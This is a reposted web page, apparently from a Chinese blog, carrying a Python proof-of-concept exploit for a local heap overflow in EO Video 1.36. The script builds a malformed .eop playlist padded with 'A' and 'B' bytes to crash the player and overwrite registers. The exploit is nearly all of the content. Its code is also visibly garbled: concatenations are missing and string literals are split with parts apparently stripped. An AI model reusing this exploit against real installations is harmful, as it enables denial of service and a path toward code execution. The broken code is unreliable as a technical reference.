studyart.cn studyart.cn

欢迎光临
我们一直在努力
顶部
域名
云服务器48/月

EO Video 1.36 Local Heap Overflow DOS / PoC _Exploit_网络安全_

#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = '\x41'* 700 '\x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('\n\n\n\nnesto\n1\n ')
fileHandle.write ('
\n\nnesto\n1\n\n
\n\n ')
fileHandle.write ('' bafer '')
fileHandle.write ('0\n0\n\n-1\n-1\n\n ')
fileHandle.write ('30216\n0\n ')
fileHandle.write ('
\n
\n
\n')
fileHandle.close ()

【声明】:本博客不参与任何交易,也非中介,仅记录个人感兴趣的主机测评结果和优惠活动,内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。
-六神源码网 -六神源码网